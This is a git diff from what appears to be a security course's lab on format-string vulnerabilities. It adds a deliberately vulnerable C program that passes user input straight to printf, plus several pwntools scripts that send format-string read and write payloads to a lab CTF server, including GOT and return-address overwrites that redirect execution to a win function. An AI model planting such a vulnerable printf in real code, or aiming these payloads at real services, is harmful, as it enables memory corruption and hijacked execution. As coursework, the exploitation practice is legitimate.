zFMqe(pUH(DN~TweXv7J%CNiT|Yt)Ii##50I;aTQe&pkeWI}W^ED0~w<1^ycN3*aZf
zuYo@ee(9Y;;Z5-RcMAm_j})E)Zv+1x_z?ID;4$##tA)b1!P~*lgKq$T9i00-CeOpW
zgy*R4Sr*W=&qL2g2>gw`4ehKaps!k|t_^e$I{BM4@*xl&8;E`XQ79Y&7eRd>7`V5#
z#?g+5dzP-dt)uZ~mg9KN05e1kQV4Vu^cL#s1{eK7{iL^dzQ1qM=e#_FUf}n9sGk9O
zF~$?%CCrw`eUqBkp6PkD=Vc(-&kLXjfeV3`aQkR=$C5AFA<DD`pVvS`C}UA0+aC-D
z9{2SG>;6FN2{ugnHw8nZ!N#6oQ(v&TFW9y%7}^|c=$Q%D^}G@c^t>9>dtMF}>)!&O
zIjBqdg=0Plodun0laFD>pgRa1^K5g{yFEy3B~?67@j%4`6%SNAQ1L*;0~HTcJW%mK
z#RI>~9(el+O+N?1mPo$G%l$6jKc5eF<Vj6m0?zlzmw|H+#dn(PAalP*`TgG%GEKj)
z>D+T&0Ou>aTfpamXF+^tnR}~GfS9=V#v9l=->q%}aqr8YGH(K%nACLUkAm}kXC1_M
z=*jWJXl4+4{1%yEU$JG)Y=DgH|2pygcU7nxV;uq=0*!%=fs}3YrcHN+n)VLo(oQb4
zF5DSzYiZ9(sr}K8ws2c#xZ_q=FSqILYvb-l^8>i_O;r#0lNh&a(L8^M{s(RcItW8K
z(EAlAyg$0B9n7ay-v^w}Q?&+6TT7Kk4^!o>-iN{f47dP3YVdjePXOZA{CM$Ocmq_m
zHb2Z#y8lDTs(YaH{w0e(z2pp4n*Y~e-U+Jycv%|xDy>>JrP~nBXzh9zY{s`CXm?bP
zfC*y}N77~dHFd_1`ME|4y74-&+FB_Dj8QbEt&>8X@ho9?Nuj|wOxSuUEH?g@mJL!^
zZmghXqZC5M`xLsR&}e*%LXQ-hj1w%=D}`p`A1U-L+5teDahkA!hP_~&#w3L;ve#>k
z^Axs9VS{lq`*v^5=TWrVSVUo4{e2MnjJF8eUb`Q{fDxr-hkgLM%|;c4owe-z7ULEQ
z`{#4I291AWnFBYCgY7ZCMB(6)<6!%Y4HO=b-8pD*HE0hSe+72PxR(}l-f9Rj;~5Hv
zWZx3TQC2;yKMq|=c*g<oS1<V+uz9!9@wW$S_5o3?v4(1mh5*+F`!%2IhT2{TH9wSq
z&oTQ&nLUb6iTyG%68n21_ygptP6fX%5uEJcDl}8|1*r+XgX*eIyZJ|0_0j+rLEsGl
zIoq{D`v+N)CmXbXVR0XdS1(&iYu$Nh^%dS)4|N(>OpwPZjK-kMBP)y!S!3`d24$>q
z^R<8*>t%ky8r0+YgrBYQO_dP1=d1M_fc6Bdx}f1=@O;%lk%c>nt)0ib?};mqx`RCd
zNe=cg(ST=t!ednNE7vWH3C{x0>fpi}UvOD)fv3Kz4p$-XBH;_(RkOZkUCmZpe0+_f
zrsi%SFu+>`HU6Romx-!c7%?_7n)HPpU$CaeE$xBAm|s@eT0rN`){co;2<rx1VFMn|
z)`i5+Ux_AKfeUt)6})E&LA5K<=enZa&)&KE1z~Z|lG!eE9Nmkb>P3nAuxHj%(zBg~
z<<)!f9IQcBqPsmWLD66nT<sHA=q}Gk!TI=<2d6jzt+}i%kL8R+qpe5Qc9~tB?(v+K
zk#w$gU28HOP32;ikhr4II-GQ}H)>j)i81SXJ-*LtP1|yEb~+qI^8&|PVpcqy;B896
zk;RN>9Xl6w%z>?g{ZL@GXLCFdlYvqLY9eb|ww+359k*C6jcm*{j#y4+%rT=G+j5P<
z9}s>o*U3`9U*E5<^m{<_6Z*7&-gD4g)ITFN0sRD|jegJ9yf_8pK_$s_On^n~5#c^i
z&N@zOZ!#URCt7;ak<>&snQhq}O=L2umX5aeHLaTxkyOe`k678(p@-5f0~vcX;_P;C
zerF`x8kZ7ANXg7*GjX%zl-9`Dm^}8w@yhX~F+leqP-NUPE%YRt$k<MZcZ6*6Vas%+
z^&vaySmu}mET42|rE)kIH-{rx3+H{T^mx+F;CRqz#6E1<uAL`|WR+&zwk+Gqnkd03
zVVkK;dL$%2*p!*dL=U4L<hwfAW;AERx2fDH>dd5KW+oobT8_x2v&oUP6$?cZ5nGJs
zQt7gaN=8{D4mY`-5vCjx+vbTUcPMVZb7`J@>Y(@8C!FUBZE9cR-kw7(qjz-R!^x$s
zjUyHum5f4+*wMtsWY^lRP|L_jY&g^sk7Os((F8`H$z@w|X<RU3Ely-OWo2QMr=?oP
z?2KbYos8XrdEvm7A)1P06Uv;-q+y80%jA-uIWwhc#M*WbV=2FKiNbqhk=UIA<BVH&
zaT;%Mi934MX40pwv*SsurVN~(kVm}eq-4x8V-Y8U8O`A9D8a?GFpTqGxiNR<`E9`r
z$u-d-I~xT&I_|C-xd2>Gk4ulJX_P0=xZtF*?0d$Uz<*hjEX^f{Mlv~9$7O<Ud`#jQ
zN}Al0neMqnSH^c9iDwX98DDuM9WkdX<J*qJnADZsUjrDEy0Uwy>_SQAEeXHH6k|!B
zj5cv!FUf|qGbUxmCm7kfu`0PwM!3in<3^wS#RwO#lFUdN=90{)&pm5O?!!%#iLo}h
zPo1QDM#&4Pmgg$TeS(oO>MPlCIY(lQPVOuIn#360mEFi&#k@YTh-!Hb&$To1MnX(Z
z<`cLZAcaaYZX`&2vy$9*-Kj>(+!@R!pA3b|<xkEE$oa&l=E!_GayI!yNbW<FMicK8
zxF_kx#h5xT{6!BQE0b43<{n1b*B~R`1O@k?zXRaPA0F&PMj><G119U609XF=z<*EE
zP)uweH=I(U{O6DsKkJtF$Q??_jC;*Hh3`OA?Qw@Q16lds1ONXJvTBd^pF-xDSumt}
z@h(}>-yX~dH)lgwA6&`x82{q34skW`9^HoVaOKx~YsEBVHGd(oMBF_GKLmMialH{A
zhpb{L)_)kXn(sQ4uZOJGXT7&h*pO9X`+o#kwMYC{=GdPrlS9D20J*U^z6IVT;v(eo
zbFKVMR3+B`KIF@Y^(^GsKR+%3Du|=}1L&KJ_0?g%4cJ5Qhx8Z5cZTKh{aarwzmk^_
z_?!OXIoc-3v*TSVIw7lQll8BI{1dbfxb!bK8;9UOep96X%F1&*a={e8@AY1+-l*+l
z9bC(CvBwS58o?#rvQ1~yjN-0|xW_bO8FM6+8IGjP7;Y_DGm<+ZqM6aLl;v2l@S3iU
zJAOOJj3?7cGh*A33EZ9?dqTwR$SAJ&xzW)H6e*K%Lryx^LCbGKra7>yXIsD7zrD{i
zQSdr2?l67(xA$z@y6Jk0JWLD~ZnkFsmSPQC`gRF(^Wcu&o<VcRz`*YQJ?5UC-obv>
zDvuyXvpLyqc|5thTb(-QSz|<zVMJr*Sk!b9x%A=i@R8zK=Kl^i=0*^v<=*M$9BrO0
z-HBERaZfZC4@b|MZ#eJ_bT(rqBI#HPx6bQNS>JG^`uciGgQYJ8Hy>s!g^(6Ez6c^P
zIL}E&&9NlvjgOg$htRX(EW$jV&@KiAH##J81TYzil+JB4;EJT6-m`5}asEU&J28se
zG`M5CJfU)ks4RO-gwu#)!idzv!?`35)+b|SDg-%WmhDUwRXx315eAJ22~Qx*5#iWG
z8cnzy_jPF*N3@8*=Q_cJ4MQg0&5WfS5tbeaBOA_IQ4w~mBT#ZF1Cx<67`76{#hZws
z3MIKk-Bs+CP<b>E8BL<Hkqqj>2dhW_82E(YR}sedX%ycP=&a$~2+Bnmb}KQNj%QRp
zGCXWs<4VGx9I#X#PUKbKf0lS><fROk2lwwnKydHYZh6|6R)H9W5GVis0t}7FtHkRR
zQx{0#<lkWcj?dv#Qn;;9C>-M=K5Ppq5V*qKkNgLCj>dKwFY!7ULf(y#TpY0x5cZ_9
ze~hEH0Cx;B+dvm&eSF531Th+8eT=UzAd^L2C1ROA2jX));uv>rKp~b_?NU#A6vXF#
z%rhPv1g;JF@^&GLDG;MH;uxnL1&$YMRUgMd`6&=_y`U4o@!3EV^2G64u5e#No_&?&
zc^yaR8X>Dh9MhkG6pry;8*qncC?<}H*uMZN9OJ-g7>0@%GU7<z0x2BtSC^rDnu97P
zVwlc?6pr`hBUn^!)F#ccP3Cx>hB#RT?sp>e+sE-z8IEyCBXB9`R8r%84GL8s<Im}k
z5PX=alEVE23dU$~uZ(ke@<`c;WuEjFh|w=`jF;*@2KO%PoD1R@NAd5N<dNq(U}9aI
z-;Y4-4srZD6W2bbK7tfZ##wDbgiuB$)jy*Q$M_}$9NSTeIHp?QsAs#3BbtCyHrm-1
zQ$w*nm}MgF_F|rlIMOGJIO>>o0~eAx_k$Rw<~g`5a9?I8ib>(t&cV&=6oSt{RZ>|#
zPgZ%_n(uVmn2Xz0#Hn%Y!-eV2Iqk9@QrYqq)9Zw|49DCIeFum>ssr&mSyo((-7SP&
WR#5ecJE3yi&$@+pKpA0E+5ZA87|_`O

literal 0
HcmV?d00001

diff --git a/pa/lab7/08_return.c b/pa/lab7/08_return.c
new file mode 100644
index 0000000..89f7609
--- /dev/null
+++ b/pa/lab7/08_return.c
@@ -0,0 +1,23 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#define BUFFER_LEN 128
+
+void win() {
+    printf("You win!");
+    system("cat /home/ctf/flag");
+}
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+}
+
+int main() {
+    vuln();
+}
diff --git a/pa/lab7/chall_call_functions_again.py b/pa/lab7/chall_call_functions_again.py
new file mode 100644
index 0000000..8ebaeaf
--- /dev/null
+++ b/pa/lab7/chall_call_functions_again.py
@@ -0,0 +1,42 @@
+from pwn import remote, process, p32, ELF
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+		write = f"%{n}x%{arg_n}$hhn"
+		print(write)
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25197
+
+conn = remote(HOST, PORT)
+#conn = process("07_call_functions")
+#input()
+
+elf = ELF("07_call_functions")
+got_puts = elf.got['puts']
+win = elf.sym['win']
+pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+
+#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_local_read.py b/pa/lab7/chall_local_read.py
new file mode 100644
index 0000000..a4dc508
--- /dev/null
+++ b/pa/lab7/chall_local_read.py
@@ -0,0 +1,12 @@
+from pwn import remote
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25191
+
+conn = remote(HOST, PORT)
+
+pl = b"%7$s\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_return_address_again.py b/pa/lab7/chall_return_address_again.py
new file mode 100644
index 0000000..692ab44
--- /dev/null
+++ b/pa/lab7/chall_return_address_again.py
@@ -0,0 +1,41 @@
+from pwn import remote, process, p32, ELF
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		write = f"%{n}x%{arg_n}$hhn"
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25198
+
+conn = remote(HOST, PORT)
+#conn = process("08_return")
+#input()
+
+elf = ELF("08_return")
+# dest local is ffffcc1c, which is 1$ + 144
+# remote 1$ is ffffdc6c, so dest should be ffffdc5c
+dest = 0xffffdcfc
+win = elf.sym['win']
+pl = print_to_ram(dest, 7, p32(win)) + b"%3$08x\n"
+print(f"Win={hex(win)} Payload: ({len(pl)})", pl, "\n\n")
+
+#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+conn.interactive()
diff --git a/pa/lab7/chall_short_local_read.py b/pa/lab7/chall_short_local_read.py
new file mode 100644
index 0000000..17c10cb
--- /dev/null
+++ b/pa/lab7/chall_short_local_read.py
@@ -0,0 +1,12 @@
+from pwn import remote
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25192
+
+conn = remote(HOST, PORT)
+
+pl = b"%7$s\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_big_numbers.py b/pa/lab7/chall_write_big_numbers.py
new file mode 100644
index 0000000..61e1684
--- /dev/null
+++ b/pa/lab7/chall_write_big_numbers.py
@@ -0,0 +1,38 @@
+from pwn import remote, process, p32
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+		write = f"%{n}x%{arg_n}$hhn"
+		print(write)
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25196
+
+conn = remote(HOST, PORT)
+#conn = process("06_write_big_number")
+#input()
+
+pl = print_to_ram(0x804c044, 7, p32(0xdeadbeef)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+#pl = "AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_specific_byte.py b/pa/lab7/chall_write_specific_byte.py
new file mode 100644
index 0000000..09c2ba6
--- /dev/null
+++ b/pa/lab7/chall_write_specific_byte.py
@@ -0,0 +1,18 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25195
+
+conn = remote(HOST, PORT)
+#conn = process("05_write_specific_byte")
+#input()
+
+tgt_addr = p32(0x804c044+3)
+
+#2 + 256 - 4(ptr) = 254
+pl = tgt_addr+b"%0254x%7$hhn\n"
+#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_specific_value.py b/pa/lab7/chall_write_specific_value.py
new file mode 100644
index 0000000..cf8f7ac
--- /dev/null
+++ b/pa/lab7/chall_write_specific_value.py
@@ -0,0 +1,18 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25194
+
+conn = remote(HOST, PORT)
+#conn = process("04_match_value")
+#input()
+
+tgt_addr = p32(0x804c040)
+
+#327 - 4(ptr) = 323
+pl = tgt_addr+b"%0323x%7$hn\n"
+#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_to_memory.py b/pa/lab7/chall_write_to_memory.py
new file mode 100644
index 0000000..553daba
--- /dev/null
+++ b/pa/lab7/chall_write_to_memory.py
@@ -0,0 +1,16 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25193
+
+conn = remote(HOST, PORT)
+#conn = process("03_write")
+#input()
+
+tgt_addr = p32(0x804c040)
+
+pl = tgt_addr+b"AAAA.%7$hhn\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)